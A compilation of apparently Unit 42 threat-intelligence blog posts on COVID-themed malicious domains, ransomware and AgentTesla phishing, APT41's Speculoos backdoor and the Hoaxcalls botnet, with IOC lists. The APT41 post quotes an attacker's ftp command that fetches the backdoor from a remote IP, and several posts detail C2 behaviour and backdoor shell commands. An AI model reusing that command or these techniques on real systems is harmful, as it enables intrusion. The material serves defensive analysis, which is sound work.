Illustrated in Figure 20, we observe numerous suspicious parked pages hosted on newly registered coronavirus-themed domains. For example, one type of parked pages was found on more than 200 unique coronavirus-themed domains. Such pages all load a potentially malicious JavaScript from a parent URL http[:]//cdn[.]dsultra[.]com/js/registrar.js.

A partial snippet of the script is shown below. Upon a page’s load, the dL function is executed, which sends out a request with URL, Referrer, timestamp, and cookie information to hashtag.sslproviders[.]net (note, the particular subdomain was observed to change with reloads of the script). Then, it listens to a response in the bL function and will redirect the user's browser to any destination received by changing the parent.top.window.location.href value. Although in many of the observed cases it does not receive a new destination URL in the response, the script itself could ultimately serve as a potentially malicious arbitrary URL redirector.

Figure 21. Partial snippet of a malicious redirector found over many coronavirus-themed parking domains

IP Loggers on Coronavirus Domains

coronvirus scams game
Figure 22. coronavirus-game[.]ru serving IP loggers
Some content-rich coronavirus-related websites include suspicious scripts. A good example of such scripts are IP loggers, e.g. on coronavirus-game[.]ru (Figure 22), there is an obfuscated script, which drops an invisible iframe that sends user’s IP addresses to the legitimate IP logging service, iplogger[.]org.

Coronavirus Websites with (Dead) Cryptojacking Scripts

Figure 23. Unsuccessful in-browser cryptojacking on coronavirusinrealtime[.]com
Interestingly, we noticed that many of the new coronavirus websites, such as coronamasksupply[.]com and coronavirusinrealtime[.]com embed “dead” in-browser coin mining codes, as shown in Figure 23. Most use the outdated Coinhive service, or obsolete Webminerpool and Crypto-Loot scripts, and as such fail to load correspondent mining libraries or establish a connection with a no longer active websocket endpoint. We suspect that those campaigns copy-paste previous intrusive codes from their older websites, without checking on whether the code is still working or not. Similarly, even content-rich web pages that leverage the popularity of pandemic-related information run unsuccessful cryptojacking, which receives errors on websocket connections to obsolete mining endpoints.

In addition, we also found examples of working in-browser cryptojacking scripts. Examples include JSE-coin on coronashirts[.]store. We wrote more about intrusive coin miners one year ago in a previous blog.

Conclusion

Unfortunately, there will always be cybercriminals who will attempt to victimize people during local, national, and world events when their fears are elevated. We have observed this same type of behavior time and time again when calamitous events occur, cybercriminals start to circle for victims. Sadly, we do not expect this exploitative type of behavior to go away anytime soon.

In the case of coronavirus, we observed a steep increase in the number of coronavirus-related domain names registered every day, matching the rise of user interest in the pandemic. Worrisomely, we found a 569% increase in the average daily number of malicious coronavirus NRDs comparing February to March and a 788% increase for high-risk domains. Since January 1, we identified 2,022 malicious and 40,261 high-risk NRDs. We discovered that these domain names are employed for a wide variety of malicious purposes, including malware distribution, phishing attacks, scams, and black hat SEO.

People should be highly skeptical of any emails or newly-registered websites with COVID-19 themes, whether they claim to have information, a testing kit, or a cure. Special care should be taken to examine domain names for legitimacy and security, such as ensuring it is the legitimate domain (google[.]com vs g00gle[.]com), and that there is a lock icon to the left-hand side of the browser’s URL bar, ensuring a valid HTTPS connection. Similar care should be taken with any COVID-19 themed emails - a look at the sender’s email address often reveals the content is likely not legitimate, as it’s either unknown to the recipient, mis-spelled, or suspiciously long with random seeming characters.

To protect users from cybercriminals, Palo Alto Network’s best practice recommendation for URL Filtering is to block access to the Newly Registered Domain category. However if you cannot block access to the Newly Registered Domains category, then our recommendation would be to enforce SSL decryption to these URLs for increased visibility, to block users from downloading risky file types such as PowerShells and executables, to apply a much stricter Threat Prevention policy, and increase logging when accessing Newly Registered Domains. We also recommend DNS-layer protection, as we know over 80% of malware uses DNS to establish C2.

As for the threats and IOCs specifically outlined in this blog, the following steps have been taken to ensure optimal detection and prevention mechanisms within the Palo Alto Networks technology stack to the extent possible:

    • Domains, IP addresses, and URLs have been categorized appropriately.
    • Wildfire verdicts for all samples have been updated and/or verified.
    • Intrusion Prevention System signatures have been created, updated, and/or verified.
    • Cortex XDR detections have been deployed, updated, and/or verified.
    • Autofocus Tags have been created, updated, and/or verified.

Due to the suddenness of the coronavirus outbreak, many employees are self-isolating and working from home. While organizations have always provided secure access to their employees via VPN connections, the enormous amount of employees requiring secure access is unprecedented and requires additional resources and capacity. Palo Alto Networks offers Prisma Access, a cloud-delivered secure access service edge (SASE) platform that provides consistent policy enforcement and security for remote offices and mobile users, and will scale up and down as business demands evolve.

To learn more about how Palo Alto Networks can help your remote employees, please see our resources here and check out Nir Zuk’s webcast on how to enable business continuity.

Acknowledgements

We would like to thank Shawn Huang, Wei Wang, Tao Yan and Wanjin Li for their help with providing some of the data sources necessary for our analysis. We would also like to extend our gratitude to Daiping Liu, Kelvin Kwan, Eddy Rivera, Mark Karayan, Zoltan Deak and Jen Miller Osborn for their advice and help with improving the blog.

IOCs

Credential Harvesting:
corona-masr21[.]com/boa/bankofamerica/login.php
corona-masr21[.]com/apple-online
corona-masr3[.]com/CAZANOVA%20TRUE%20LOGIN%20SMART%202019/
corona-virusus[.]com

Scams:
allsurgicalfacemask[.]com
surgicalfacemaskpharmacyonline[.]com
selectsanitizer[.]com
survivecoronavirus[.]org
facemasksus[.]com
coronavirussecrets[.]com
pandemic-survival-coronavirus[.]com
internet-covid19.xyz
coronavirusaware[.]xyz
covid19center[.]online
Whatsapp[.]version[.]gratis
whatsapp[.]cc0[.]co

Coinminers:
coronamasksupply[.]com
coronavirusinrealtime[.]com
coronashirts[.]store

Black Hat SEO:
coronavirus-latest-update[.]info
coronavirus-com[.]info
sharkroulette[.]com
Illicit pharmacy:
covid19-remedy[.]com
rxcovid[.]com
anticovid19-pharmacy[.]com

Other Suspicious Domains:
coronavirus2day[.]com
hashtag.sslproviders[.]net
coronavirus-game[.]ru
buygoods[.]com

Legitimate IP logging service:
Iplogger[.]org

Deployed Phishing Kits:
corona-masr4[.]com/test.zip
07bc3abcb6f3a7f7ec38f088068f5cefc953111e066b4dddc35cf43e836b215e
corona-virusus[.]com/OwaOwaowa.zip
c77c5df13430db98d0eaac6e593fc28e90df3f1ef6c48f81cc5681c67f91b4a8

Generic Android Trojans:
coronaviruscovid19-information[.]com/it/corona.apk
3d30b7df52672307b20beb1deb7b3b18e06edca63a6583d92125cba8329da107
coronaviruscovid19-information[.]com/en/corona.apk
1de6e6c140ff1b301b7df12d4b6388a21a6fbf0f141347dd2f9289740438a6d8
corona-virusapps[.]com/s1/CoronaVirus-apps.apk
a754c35dd09677b0b96d8a0dad5c9c5fdd28abd8cf2d8d38a9bd945ca8362e02
corona-virusapps[.]com/s2/CoronaVirus-apps.apk
bca52647ce9f4900b754fcc0d8ef6329fb0229401e833534905969d10a82d839
corona-virusapps[.]com/s3/CoronaVirus-apps.apk
c3096b341d6807a5a7d353f97554017a6242349b081837de60908081bcada1d0

RedLine Stealer:
covid-19-gov[.]com
45.142.212[.]126
c50c4cff782e1bb7171ffb04cb7c1ff69af47371e059bf300fed68949c77514c (hosted zip file)
f3b0aa7d9664258c9e1783289c4fc56e05b23e3eb9a3557f55733806564deb73 (payload)

DanaBot:
202.195.34[.]6
corona-map-data[.]com/bin/regsrtjser346.exe
44c7ef261a066790a4ce332afc634fb5f89f3273c0c908ec02ab666088b27757

NetSupportManagerRAT
5.181.156[.]14
covidpreventandcure[.]com
covidwhereandhow[.]xyz
1a08a65d4199f08d60644f2aee1182d87f29b36d38257239e5c80965ed65e0d1

AzoRult:
coronavirusstatus.space
2b35aa9c70ef66197abfb9bc409952897f9f70818633ab43da85b3825b256307

Redirector (registrar.js):
coronavirus123[.]org (parent URL)
covide19cleanse[.]com (parent URL)
cdn.dsultra[.]com/js/registrar.js
f6a46b22d26523d4db3dd78fa77c56d4e755aed942321751eda0f48955861ab9

Skimmer (ccard.js):
www.sunrisepromos[.]com/promotional-personal-care-accessories/personalized-hand-sanitizer.html (parent URL)
www.sunrisepromos[.]com/js/lib/ccard.js
e43bdc87269d0b9da7742049dd533db93579cf3126df433f08e8265edd09243e

External Lists:
Credential Phishing IOCs: https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Phishing%20User%20Credentials%20with%20Coronavirus%20Domains

Scam IOCs:
https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Feeding%20on%20Coronavirus%20Fears%20for%20Profit

Black Hat SEO IOCs:
https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Abuse%20of%20Coronavirus%20Trends%20for%20Black%20Hat%20SEO

Suspicious Registrations:
https://github.com/pan-unit42/iocs/blob/master/COVID-19%20IOCs/Proactive%20Registrations%20of%20Suspicious%20Parked%20Pages

 

Malicious Attackers Target Government and Medical Organizations With COVID-19 Themed Phishing Campaigns

Posted on by Adrian McCabe

Executive Summary

Despite prior reporting by various sources indicating that some cyber threat attacker activity may subside in some respects during the COVID-19 pandemic, Unit 42 has observed quite the opposite with regard to COVID-19 themed threats, particularly in the realm of phishing attacks.

While the various COVID-19 themed phishing campaigns observed by Unit 42 are numerous, this blog seeks to provide a thorough picture and solid technical analysis of the cross-section between the various types of COVID-19 themed threats organizations may be facing during the ongoing pandemic. Specifically, we address a ransomware variant (EDA2) observed in attacks on a Canadian government healthcare organization and a Canadian medical research university, as well as an infostealer variant (AgentTesla) observed in attacks against various other targets (e.g, a United States defense research entity, a Turkish government agency managing public works, a German industrial manufacturing firm, a Korean chemical manufacturer, a research institute located in Japan and medical research facilities in Canada).

None of the malware samples mentioned in this blog were successful in reaching their intended targets. Our threat prevention platform with WildFire detects activity associated with these threat groups while simultaneously updating the ‘malware’ category within the URL Filtering solution for malicious and/or compromised domains that have been identified.

Ransomware Campaign

Campaign Overview

Between March 24, 2020 at 18:25 UTC and March 26 at 11:54 UTC, Unit 42 observed several malicious emails sent from the spoofed address noreply@who[.]int (actual sender IP address at the time of the attack was 176.223.133[.]91) to several individuals associated with a Canadian government health organization actively engaged in COVID-19 response efforts, and a Canadian university conducting COVID-19 research. The emails all contained a malicious Rich Text Format (RTF) phishing lure with the file name 20200323-sitrep-63-covid-19.doc, (SHA256: 62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617), which, when opened with a vulnerable application, attempted to deliver a ransomware payload using a known shared Microsoft component vulnerability, CVE-2012-0158.

It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates. It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss.

COVID-19 phishing lure
Figure 1. Ransomware phishing lure

 

SHA256 Subjects Spoofed Sender File name C2 Domain
62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617 Coronavirus disease

COVID19

 noreply@who[.]int 20200323-sitrep-63-covid-19.doc www.tempinfo.96[.]lt

Table 1. Ransomware campaign attributes

Post-Infection

Once opened with vulnerable document viewing software, the malicious attachment drops a ransomware binary to disk at C:\Users\<victim username>\AppData\Local\svchost.exe, then executes it. It is worth mentioning that the dropped binary has the hidden attribute set, and has an Adobe Acrobat icon.

When the ransomware binary is executed, an HTTP GET request for the resource tempinfo.96[.]lt/wras/RANSOM20.jpg is initiated. This image is the main ransomware infection notification displayed to the victim:

Figure 2. Ransomware image download network traffic

 

Figure 3. Ransomware notification image

This image is then saved to disk at C:\Users\<victim username>\ransom20.jpg, and is subsequently set as the victim user’s desktop wallpaper. At the time of the attack, the domain tempinfo.96[.]lt resolved to the IP address 31.170.167[.]123.

After the image is downloaded, an HTTP POST request to the resource www.tempinfo.96[.]lt/wras/createkeys.php is made containing the user name and host name of the victim. Of particular note is that connectivity to the remote host is first checked via use of HTTP 100 Continue prior to the malware transmitting the host details:

Figure 4. Network traffic, victim host detail transfer

Once the remote command and control (C2) server successfully receives the victim’s details, it then proceeds to create a custom key based on the username/hostname details and sends the key back to the infected host for further processing. Once the key is received from the C2 server, the infected host then initiates an HTTP POST request to the resource www.tempinfo.96[.]lt/wras/savekey.php containing its hostname and the main decryption key for the host, which is, in itself, AES encrypted:

Figure 5. Network traffic, ransomware key exchange

At this point, encryption of the victim’s files begins. This particular ransomware binary is configured to encrypt files with the following file extensions:

".abw", ".aww", ".chm", ".dbx", ".djvu", ".doc", ".docm", ".docx", ".dot", ".dotm", ".dotx", ".epub", ".gp4", ".ind", ".indd", ".key", ".keynote", ".mht", ".mpp", ".odf", ".ods", ".odt", ".ott", ".oxps", ".pages", ".pdf", ".pmd", ".pot", ".potx", ".pps", ".ppsx", ".ppt", ".pptm", ".pptx", ".prn", ".prproj", ".ps", ".pub", ".pwi", ".rtf", ".sdd", ".sdw", ".shs", ".snp", ".sxw", ".tpl", ".vsd", ".wpd", ".wps", ".wri", ".xps", ".bak", ".bbb", ".bkf", ".bkp", ".dbk", ".gho", ".iso", ".json", ".mdbackup", ".nba", ".nbf", ".nco", ".nrg", ".old", ".rar", ".sbf", ".sbu", ".spb", ".spba", ".tib", ".wbcat", ".zip", "7z", ".dll", ".dbf"

The encryption algorithm is fairly simple, and, when encrypted, files are renamed with a .locked20 extension:

COVID-19 ransomware encryption source code
Figure 6. Ransomware encryption source code

Additionally, this ransomware binary has a particularly substantial limitation; it is hardcoded to only encrypt files and directories that are on the victim’s desktop.

Covid19 Ransomware
Figure 7. Ransomware encryption initiation source code

Threat Identification

From the code structure of the binary and the host based and network based behaviors of the ransomware, Unit 42 has determined that the ransomware variant used in this attack is EDA2, an open-source ransomware variant associated with a larger, parent ransomware family called HiddenTear.

Additional information on this ransomware variant can be found here.

AgentTesla Campaign

It is not a surprise to see malspam actors also taking advantage of the ongoing COVID-19 pandemic crisis and using COVID-19 as a lure to entice victims to click on malicious attachments and infect their systems. Figure 9 gives an example of one such malspam campaign with a COVID-19 lure.

COVID-19 Malspam Email
Figure 8. Malspam email with COVID-19 lure delivering AgentTesla
SHA256 Subjects Sender File name Initial C2 Domain
fd4b4799079cdd970eec3884bef4771624a55297086041fd4e7fcefb1a86d08e

67b44bbf3f69e170f1e8ddea8d992dc83cfd351f06a28338b37dc16ad74826ef

14f6b1979ccc5d29c7b143009472d1edcfcdf0025bc2fa84ee445f17f091dd9a

590f84008dfd489fbf98d83e281fbb38c40d890169a9dbd482ff1f184cfb0970

 COVID-19 Supplier Notice shipping@liquidroam.com COVID-19 Supplier Notice/COVID-19 Supplier Notice.jpg.exe

Corporate advisory CoronaVirus (Covid-19)/Corporate advisory Co

 ftp[.]lookmegarment[.]com

157[.]245.78[.]47

Table 2. AgentTesla campaign attributes

Figure 10 shows the campaign flow where the email shipping@liquidroam[.]com was used to send the malspam emails to a number of our customers from healthcare, pharmaceutical, government industries among others. After further analysis of the attachments we found that the samples were droppers delivering variants of the AgentTesla malware family. AgentTesla is an info-stealing malware which has been around since 2014. Since AgentTesla has been sold in multiple forums commonly visited by cyber criminals, it’s use has significantly grown in the past years and has been one of the top malware family of choice of the SilverTerrier threat actor, infamous for BEC campaigns. More details on the SilverTerrier campaigns can be found in the recent Unit 42 update here.

AgentTesla COVID-19 Campaign
Figure 9. Maltego chart of the AgentTesla campaign

All the associated samples connected to the same C2 domain for exfiltration- ftp[.]lookmegarment[.]com. Our analysis also shows that the AgentTesla samples had hard coded credentials used to communicate with the C2 over FTP. Figure 11 shows the exfiltration over FTP, where the C2 is running a Pure-FTPd server.

Figure 11. Network traffic, exfiltration

It is also important to note that the email sender domain, liquidroam[.]com, and the C2 domain, lookmegarment[.]com, are legit business domains providing sales of electric skateboards and garment textiles, respectively. It is likely that the domains have been compromised and their infrastructure being used in the wider campaign of the cyber criminals.

Conclusion

The objective of this blog was to give a deeper understanding on some of the types of cybercrime campaigns being faced by multiple critical industries dealing with the urgent and critical response efforts of the COVID-19 pandemic. It is clear from these cases that the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are in the front lines and responding to the pandemic on a daily basis.

While this blog specifically focused on two campaigns, Unit 42 is tracking multiple campaigns with COVID-19 themes being used by threat actors on a daily basis and this trend is likely going to continue for weeks to come. We will continue updating the Unit 42 blog with new findings and observations on how the ongoing COVID-19 pandemic is being leveraged by cyber criminals for illicit profit.

Palo Alto Networks customers are already protected from the mentioned threats by:

  • Deploying Threat ID 1114703, 2878137, 2855181, 2850820, 2811429, 2888946
  • Wildfire successfully classifies the samples as malware
  • C2 domains are classified as malicious in DNS Security

IOCs

Ransomware Campaign:

RTF Phishing Lure: 62d38f19e67013ce7b2a84cb17362c77e2f13134ee3f8743cbadde818483e617

Additional related RTF Lure (origin unknown):

42f04025460e5a6fc16d6182ee264d103d9bcd03fffd782c10f0b2e82b84f768

Ransomware Binary:

2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326

Mailing Infrastructure:

176.223.133[.]91

C2:

tempinfo.96[.]lt

31.170.167[.]123

AgentTesla Campaign:

AgentTesla Samples:

fd4b4799079cdd970eec3884bef4771624a55297086041fd4e7fcefb1a86d08e
67b44bbf3f69e170f1e8ddea8d992dc83cfd351f06a28338b37dc16ad74826ef
14f6b1979ccc5d29c7b143009472d1edcfcdf0025bc2fa84ee445f17f091dd9a
590f84008dfd489fbf98d83e281fbb38c40d890169a9dbd482ff1f184cfb0970

408bd4ffdff006738289dc51f1e51b00662508628ef8bb6147e3d88d4740ec4b

C2:

ftp[.]lookmegarment[.]com

157[.]245.78[.]47

 

APT41 Using New Speculoos Backdoor to Target Organizations Globally

Posted on by Bryan Lee

Executive Summary

On March 25, 2020, FireEye published a research blog regarding a global attack campaign operated by an espionage motivated adversary group known as APT41. This attack campaign was thought to have operated between January 20 and March 11, specifically targeting Citrix, Cisco, and Zoho network appliances via exploitation of recently disclosed vulnerabilities. Based on WildFire and AutoFocus data available to Unit 42, we were able to obtain samples of the payload targeting Citrix appliances, which were executables compiled to run on FreeBSD. We also used this data to identify multiple victims in industries such as healthcare, higher education, manufacturing, government and technology services in multiple regions around the world, such as North America, South America, and Europe.

This blog will be specific to the FreeBSD-based payload that we have named Speculoos. We identified a total of five samples from our dataset, all of which were approximately the same file size, but contain minute differences amongst the sample set. The subtle differences indicate that they likely originated from the same developer and were either recompiled or patched. As described by FireEye, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletin CTX267679 which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, considering the exploitation of the vulnerability in conjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates the adversary was absolutely targeting the affected devices.

Palo Alto Networks customers are protected from this threat. Our threat prevention platform with Wildfire identifies this malware as malicious while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or compromised domains that have been identified. AutoFocus customers can continue to track Speculoos activity by using the Speculoos tag.

Attack Details

In this attack campaign, the adversaries exploited CVE-2019-19781 to direct the victim appliances to retrieve Speculoos over FTP using the command /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/<filename> as reported by FireEye. Our data was consistent with this activity, with the first wave beginning on January 31, 2020 evening UTC to February 1, 2020 afternoon UTC using the filename bsd. This wave affected multiple higher education organizations in the United States, a healthcare organization in the United States, and a consulting firm in Ireland. A second wave began on February 24, 2020 morning UTC through February 24, 2020 after midnight UTC, this time using the filename un. This wave affected a higher education organization in Colombia, a manufacturing organization in Austria, a higher education organization targeted in the first wave in the United States, and a state government in the United States. While the data Unit 42 has access to is not exhaustive, examining the spread of victims we do have data on appears to indicate that this attack campaign may have been more of an opportunistic push by APT41 to gain footholds in a large number of organizations with minimal effort to expand their attack infrastructure.

The deployment of a tool to run specifically on FreeBSD is fairly novel. Malware targeting BSD-based systems are relatively rare, and considering the use of this tool in conjunction with a vulnerability affecting specific Citrix network appliances, it is highly likely Speculoos was specifically crafted for this attack campaign by APT41.

Binary Analysis

The Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 to run on a FreeBSD system. This payload does not appear to natively be able to maintain persistence, so it is likely it requires the adversary to use a separate component or additional step to maintain their foothold. Upon execution, the payload enters a loop that calls a function to communicate with the following command and control (C2) domain over TCP/443:

alibaba.zzux[.]com (resolving to 119.28.139[.]120)

If it is unable to communicate with the domain above, Speculoos will attempt to use a backup C2 at 119.28.139[.]20, also over TCP/443. If it is able to connect to either C2 server, it will carry out a TLS handshake with the server using the hardcoded buffer in the binary which is used as the first packet in the handshake. Before sending the hardcoded buffer to the C2 server, Speculoos modifies offset 11 with the current time and offset 15 with 28 pseudorandom bytes generated by iterating through the domain string, adding the current time and then using XOR on each byte with 7 multiplied by the byte's offset as a key. Figure 1 shows the hardcoded buffer before Speculoos modifies and sends it to the C2 server.

Figure 1. Hardcoded buffer used as the TLS Client Hello packet sent to the C2 server

Figure 1 suggests that this is a handshake packet for TLS 1.0, specifically the Client Hello. The most interesting part of this Client Hello packet is that it is requesting login.live[.]com as the Server Name Indication (SNI), which suggests that the author may try to make the handshake look innocuous, as seen in Figure 1.

Figure 2. Client Hello packet in the TLS handshake uses login.live.com as the Server Name Indication

After successfully connecting to the C2 and completing the TLS handshake, Speculoos will perform an initial system enumeration to fingerprint the victim system then send the data back to the C2 server. The buffer used to store the information will be 1048 bytes and will be structured as seen in Table 1 below.

Offset Description Notes
0 Identifier Hardcoded string “freebsd”
64 Unknown Hardcoded “5”
68 Username Uses ‘getuid’ to get user of process, then ‘getpwuid.pw_name’ to get the name
132 MAC addresses Uses if_nameindex to iterate through interfaces
152 OS version Results of ‘uname-v’
216 Hostname Results of ‘uname-s’ or ‘hostname’
280 Disk space Enumerates file systems at ‘/’ and ‘/private/var’
904 Physical memory Sysctl hw.physmem
908 User memory Sysctl hw.usermem
912 Number of CPUs Sysctl hw.ncpu
916 CPU speed Sysctl machdep.tsc_freq/1000000
920 CPU model Sysctl hw.model

Table 1. Structure used to transmit gathered system information to the C2

The data is sent over the TLS channel and two bytes of data are expected in response by Speculoos. After a successful response, it will then send a single byte (0xa) to the C2 and enter a loop to begin receiving commands. The commands in Table 2 are then made available for the adversary to execute on the victim system. The commands available to Speculoos indicate that this tool is a fully functional backdoor which gives the adversary full control over the victim system.

Command Sub-command Description
0x1E Creates shell related sub-command handler
w (0x77) Creates a remote shell by forking off a “/bin/sh” process and redirects standard input, output and error to the TLS socket
f (0x66) Creates disk related sub-command handler
f (0x66) Remove File (unlink function)
k (0x6B) Remove Directory (rm -rf "<path>")
e (0x65) Run specified file (execv)
g (0x67) Download file
i (0x69) Upload file
0x14 Enumerate Processes (Name, PID, PPID, Threads)
0x15 Kill process
0x1 List Folder Contents
! (0x21) Execute command using “sh -c”

Table 2. Commands in Speculoos’s command handler

The two Speculoos samples we analyzed were functionally identical, with only eight bytes differing between the two. This eight byte change was caused by the author replacing the uname -s command with the hostname command when gathering system information. It is unclear why the command may have been changed, as they return different results. uname -s will return the kernel information which would be the string FreeBSD on a FreeBSD system, while hostname would return print the name of the host system. Figure 2 shows a binary comparison between the two Speculoos samples we analyzed that shows the eight byte difference.

Figure 3. Binary comparison between two Speculoos samples showing different commands used to gather the hostname of the system

Impact Assessment

Vulnerabilities that allow for remote code execution by unauthorized users are nearly always a potentially high impact security issue, especially if they affect systems that are public-facing. In this case, CVE-2019-19781 affected multiple appliances that were may be public-facing, and had a highly motivated adversary actively exploiting the vulnerability to install a custom backdoor. Considering the types of appliances that were affected, it is critical that any organization that may be affected take mitigation actions immediately. Because all or a significant amount of network activity must traverse these compromised network appliances, adversaries can more easily monitor or modify an entire organization’s network activity instead of being relegated to a single or handful of devices.

In addition, because by default these appliances have access to a large number of organizational systems, lateral movement becomes far less of a challenge. The adversaries may attempt to directly traverse into other hosts that must traverse through the compromised appliances, or even be able to modify network traffic to perform additional malicious actions, such as injecting/delivering malicious code, executing man-in-the-middle attacks, or redirecting users to adversary owned login pages to harvest credentials. Lastly, due to the nature of appliances, detection of these attacks may be significantly more challenging, as generally they are black-box type solutions which are not often interacted with or inspected for anomalous activity, unless an issue arises.

Palo Alto Networks customers may be protected by

  • Deploying Threat ID 57625, 57570, and 57497
  • WildFire properly classifies Speculoos as malicious
  • C2 domain has been classified as malicious in DNS Security
  • AutoFocus customers may learn more via the Speculoos tag

Indicators of Compromise

Analyzed Speculoos SHA256

99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28

6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167

Additional Speculoos SHA256

493574e9b1cc618b1a967ba9dabec474bb239777a3d81c11e49e7bb9c71c0c4e

85297097f6dbe8a52974a43016425d4adaa61f3bdb5fcdd186bfda2255d56b3d

c2a88cc3418b488d212b36172b089b0d329fa6e4a094583b757fdd3c5398efe1

Network Indicators

119.28.139[.]20

alibaba.zzux[.]com

119.28.139[.]120

66.42.98[.]220

exchange.longmusic[.]com

Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet

Posted on by Ken Hsu

Executive Summary

As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722. As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and Draytek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devices identified during our research prior to publication in an effort to help with awareness and remediation. The Grandstream devices are business telephone systems providers over IP, whereas the latter are routers. 

Both CVE-2020-8515 and CVE-2020-5722 have a critical rating (i.e CVSS v3.1 score of 9.8 out of 10) due to their trivial-to-exploit nature. Once exploited, the attacker can execute arbitrary commands on the vulnerable device. It’s not surprising that the threat actors collect these exploits into their arsenals and start wreaking havoc in the Internet of Things (IoT) realm. While Palo Alto Networks customers are protected from such ongoing infections, they are still advised to update patches as soon as possible.

The malware is built on the Gafgyt/Bashlite malware family codebase, which we have dubbed “Hoaxcalls”, based on the name of the IRC channel used for command and control (C2) communications, and is capable of launching a variety of DDoS attacks based on the C2 commands received. In addition to its advanced DDoS capabilities, Hoaxcalls is also capable of propagation by exploiting the aforementioned critical vulnerabilities.

DDoS Bot - Hoaxcalls

Hoaxcalls is a DDoS bot that communicates with its C2 server over IRC. It has various DDoS attack capabilities based on the choice of the C2 operator. Upon reception of a proper C2 command, It can propagate by scanning and infecting vulnerable devices using CVE-2020-8515 and CVE-2020-5722 exploits.

Upon execution, hoaxcalls initializes a message table, xor-decrypts a specific message based on its corresponding index, fetches and prints the message to the console, and then encrypts the decrypted message again. The index of the encrypted string is 0x21, and the decrypted message is hubnr and vbrxmr was here.

The encryption scheme used is the standard byte-wise XOR seen used in most Mirai variants - with the exception of the use of 5 (instead of a single) 8-byte table keys:

0x1337C0D3
0x0420A941
0x4578BEAD
0x0000A10E
0x6531A466

This is effectively the equivalent of XOR-ing each byte of the encrypted strings with 0xEC. A similar use of multiple XOR keys was observed in a previous variant.

Table 1 below shows the complete list of the decrypted strings and their corresponding indices. The decrypted string at index 0x1 is used in rand_alpha_str(), and the strings with indices 0x2, 0x3, 0x4, 0x5, 0x6, 0x7, 0x8, 0x9, and 0xa are used when the malware starts the watchdog process.

Table Index Decrypted String
0x21 hubnr and vbrxmr was here
0x1 afsadhgqegtx5425
0x2 /dev/watchdog
0x3 /dev/misc/watchdog
0x4 /sbin/watchdog
0x5 /bin/watchdog
0x6 /dev/FTWDT101_watchdog
0x7 /dev/FTWDT101/watchdog
0x8 /dev/watchdog0
0x9 /etc/default/watchdog
0xa /etc/watchdog
0xd /dev/netslink/
0xe STD
0xf /usr/bin/python
0x11 /status
0x12 /proc/
0x13 /exe
0x14 /fd
0x15 /proc/net/tcp
0x16 /maps
0x17 /mnt/
0x18 /root/
0x19 /tmp/
0x1a /var/
0x1b /home/
0x1c UPX!
0x1d PR_SET_NAME
0x1e /cmdline

Table 1. Decoded credentials and commands

The bot then connects to its C2 server 178[.]32[.]148[.]5 on TCP port 1337 over IRC. The C2’s IRC channel is #hellroom. The nick, ident, and user are strings with length 13 that always start with XTC|, followed by 9 random characters. The following figure shows the bot’s C2 communication with its C2 server over IRC.

hoaxcalls connects to C2
Figure 1. Connect to its C2 over IRC

Based on the command received from its C2 server, hoaxcalls carries out different kinds of operations. The following tables show the bot’s supported commands as well as the kind of DDoS attacks hoaxcalls has employed.

Bot Commands Description
352 set spoof IP addr
376 report nickname, channel, and the key
433 reset nickname with a new random string
422 same as command 376
PRIVMSG handle flooder command
PING respond a PONG message
NICK assign nickname with a designated value

Table 2. Bot’s supported commands

Flooder Commands Description
UDP launch UDP flood against specified target
HEX launch HEX flood against specified target
DNS launch DNS flood against specified target
DRAYTEK scan and infect other Draytek devices by exploiting CVE-2020-8515
UCM scan and infect other Grandstream UCM devices by exploiting CVE-2020-5722
HELP display command usage
RULES display rules to follow when using the botnet
INFO display a brief intro about the bot

Table 3. Flooder commands

The following Figures 2 and 3 show the exploit code when the bot is scanning and infecting any potentially vulnerable victims.

hoaxcalls sample exploit
Figure 2. CVE-2020-8515 exploit in hoaxcalls group 1
Figure 3. CVE-2020-5722 exploit in hoaxcalls group 1

The flooder commands described above are based on Hoaxcalls samples in group 1. We have found other groups of the variants that are essentially the same in terms of capabilities, despite a few nuances here and there. For example, the Hoaxcalls samples in group1 employ the Draytek and UCM scanning functionalities as part of its C2 flooder command set. The samples in group 2 and 3, however, move the propagation functionalities out of the flooder commands and instead start infecting vulnerable UCM and Draytek devices upon execution. The malicious requests sent during the infection phase are also a bit different. The figures below show the differences in the sample from different groups.

Figure 4. CVE-2020-8515 exploit in hoaxcalls group 2
Figure 5. CVE-2020-5722 exploit in hoaxcalls group 2
Figure 6. CVE-2020-8515 exploit in hoaxcalls group 3
Figure 7. CVE-2020-5722 exploit in hoaxcalls group 3
Figure 8. Comparison of samples’ main()

Vulnerability Analysis

CVE-2020-8515

